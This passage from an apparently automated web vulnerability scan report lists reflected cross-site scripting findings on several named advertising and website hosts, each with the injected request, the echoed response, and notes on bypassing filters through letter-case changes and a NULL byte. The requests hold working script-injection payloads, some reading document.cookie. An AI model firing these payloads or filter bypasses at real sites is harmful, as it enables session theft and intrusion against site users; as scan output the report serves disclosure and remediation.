Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 18822
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/?955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&iy=dallas&id=44&iu=1&vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.731. http://se.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a76d7abf-e00b-41da-8545-88bfbdcb7dc0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 19198
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||6521b"><script>alert(1)</script>71abce1a13~1');return false;">
...[SNIP]...

4.732. http://se.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:34 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=se.imlive.com&ul=/waccess/50044'onerror='alert(1)'c69d85712e5/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://se.imlive.com:80/waccess/50044'onerror='alert(1)'c69d85712e5/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.733. http://smm.sitescout.com/tag.jsp [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://smm.sitescout.com
Path:	/tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e82fb'%3balert(1)//18af4187165 was submitted in the h parameter. This input was echoed as e82fb';alert(1)//18af4187165 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=79C8ECB&w=300&h=250e82fb'%3balert(1)//18af4187165&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 822
Date: Fri, 28 Jan 2011 17:00:30 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250e82fb';alert(1)//18af4187165" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.734. http://smm.sitescout.com/tag.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://smm.sitescout.com
Path:	/tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498fa"%3balert(1)//6c93725137d was submitted in the pid parameter. This input was echoed as 498fa";alert(1)//6c93725137d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=79C8ECB498fa"%3balert(1)//6c93725137d&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 822
Date: Fri, 28 Jan 2011 17:00:26 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB498fa";alert(1)//6c93725137d&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBA
...[SNIP]...

4.735. http://smm.sitescout.com/tag.jsp [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://smm.sitescout.com
Path:	/tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca607'%3balert(1)//e817e7d55a9 was submitted in the w parameter. This input was echoed as ca607';alert(1)//e817e7d55a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=79C8ECB&w=300ca607'%3balert(1)//e817e7d55a9&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 822
Date: Fri, 28 Jan 2011 17:00:28 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300ca607';alert(1)//e817e7d55a9" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.736. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf279'%3balert(1)//9e11ad01c81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf279';alert(1)//9e11ad01c81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mmtnt.php?bf279'%3balert(1)//9e11ad01c81=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:39:45 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 07:39:45 GMT; path=/; domain=.mmismm.com
Content-Length: 493
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?bf279';alert(1)//9e11ad01c81=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'&mm_pub='+mm_client+'&mm_channel='+mm_channel+'">
...[SNIP]...

4.737. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7085a%3balert(1)//2098f28910d was submitted in the action parameter. This input was echoed as 7085a;alert(1)//2098f28910d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD7085a%3balert(1)//2098f28910d&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151\ HTTP/1.1
Host: tag.contextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: FC1-WC=^54144_2_2hYC9; C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cr=405|2|-8589049292256662518|1; 513102_300X250_50151=1/28/2011 12:37:49 PM; V=gFEcJzqCjXJj; vf=1; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cw=cw;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: -891921703
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:41:02 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151\";var cf="300X250";var ca="VIEWAD7085a;alert(1)//2098f28910d";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else
...[SNIP]...

4.738. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0018ba5"%3balert(1)//19729ceb402 was submitted in the action parameter. This input was echoed as 18ba5";alert(1)//19729ceb402 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD%0018ba5"%3balert(1)//19729ceb402&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 77862555
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4888
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:30 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD.18ba5";alert(1)//19729ceb402";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else
...[SNIP]...

4.739. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"%3balert(1)//7377cbd05b7 was submitted in the cwadformat parameter. This input was echoed as c3cb7";alert(1)//7377cbd05b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250c3cb7"%3balert(1)//7377cbd05b7&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 1946838018
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:31 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250c3cb7";alert(1)//7377cbd05b7";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var
...[SNIP]...

4.740. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce0e3"%3balert(1)//eaee3633345 was submitted in the cwheight parameter. This input was echoed as ce0e3";alert(1)//eaee3633345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250ce0e3"%3balert(1)//eaee3633345&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 1942438807
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:36 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250ce0e3";alert(1)//eaee3633345";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww.cwfl;if(typeof(cwif)==_cw
...[SNIP]...

4.741. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3768c"%3balert(1)//bab2d4aa7b was submitted in the cwpid parameter. This input was echoed as 3768c";alert(1)//bab2d4aa7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=5131023768c"%3balert(1)//bab2d4aa7b&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
